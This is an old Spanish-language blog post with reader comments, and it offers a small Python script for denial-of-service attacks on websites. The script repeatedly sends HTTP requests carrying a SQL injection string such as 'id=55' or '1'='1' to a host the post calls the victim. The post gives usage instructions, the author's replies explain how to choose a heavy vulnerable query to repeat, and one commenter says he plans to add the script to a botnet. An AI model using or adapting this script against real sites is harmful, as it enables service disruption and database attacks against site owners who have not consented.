Información Importante Sobre el Contenido
Estas accediendo al contenido antiguo del blog. Este artículo "DDoS Attacker Script: Peticiones automatizadas para lograr DoS" es de dominio público y no será mantenido a futuro. Cualquier error o problema acerca del contenido por favor contactate conmigo desde la sección contacto.
“DDoS Attacker Script” es un pequeño script que he escrito en python que nos sirve para lograr con éxito un ataque de denegación de servicio en un sitio web. Este script lo diseñe especialmente para ataques de sql injection.
El funcionamiento es muy sencillo, se conecta y hace una petición de la URI especificada:
#!/usr/bin/python
import socket, sys, os
print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2];
def attack():
#pid = os.fork()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
print ">> GET /" + sys.argv[2] + " HTTP/1.1"
s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
s.send("Host: " + sys.argv[1] + "\r\n\r\n");
s.close()
for i in range(1, 10):
attack()
La línea número 6 está comentada, si prefieren la pueden descomentar para ver lo que sucede.
El uso del script es de la siguiente forma:
$ python DDoS.py www.pagina.com SQLi
En www.pagina.com obviamente pondremos nuestra víctima y en SQLi, la cadena que hará el milagro, por ejemplo “ver_productos.php?id=55′ or ‘1’=’1“
Información Importante Sobre el Contenido
Estas accediendo al contenido antiguo del blog. Este artículo "DDoS Attacker Script: Peticiones automatizadas para lograr DoS" es de dominio público y no será mantenido a futuro. Cualquier error o problema acerca del contenido por favor contactate conmigo desde la sección contacto.
mayo 30, 2010 a las 12:09 am
amigo podes explicar bien para los novatos que hacemos con ese codigo? en que parte se usa, en que programa etc gracias
mayo 30, 2010 a las 9:40 pm
@asd: Es super simple. Lo unico que hace ese codigo es crear varias conexiones a un host de destino. La idea es que encuentres una URL vulnerable (por ej. una consulta sql pesada) para ejecutarla varias veces
noviembre 9, 2010 a las 2:24 am
lo que no entiendo es como ejecuto el mardito script?
noviembre 9, 2010 a las 8:26 am
Hola “paulino perez”:
En el post aparece la instruccion para ejecutarlo:
python DDoS.py http://www.pagina.com SQLi
noviembre 30, 2010 a las 5:34 pm
muy interesante el codigo! le hare unas modificaciones para integrarlo a una botnet que estoy haciendo en python ^^”
diciembre 23, 2010 a las 1:21 pm
No lo entiendo! Cualquiera que mire el log de su servidor sabrá de dónde viene la misma petición repetida!!
septiembre 1, 2011 a las 11:03 pm
aqui lo que no se es que uso para ejecutar ese scrip… que se usa.
tengo mi lap y…. que instalo
noviembre 20, 2011 a las 9:47 pm
rafiña si usas win tienes que instalar python para poder ejecutarlo en linux viene nativo en la mayoria de las distribuciones =)
mayo 2, 2014 a las 3:28 am
enero 31, 2019 a las 3:38 pm
Si no saben cómo se ejecuta (que es súper básico) les recomiendo antes estudiar un poquito de informática.
marzo 19, 2019 a las 2:55 pm
Veo muchas personas que hacen preguntas básicas,, la verdad deberían aprender primero las cuestiones mas basicas y elementales para empezar con esto
marzo 19, 2019 a las 2:56 pm
Veo muchas personas que hacen preguntas básicas,, la verdad deberían aprender primero las cuestiones mas basicas y elementales para empezar con esto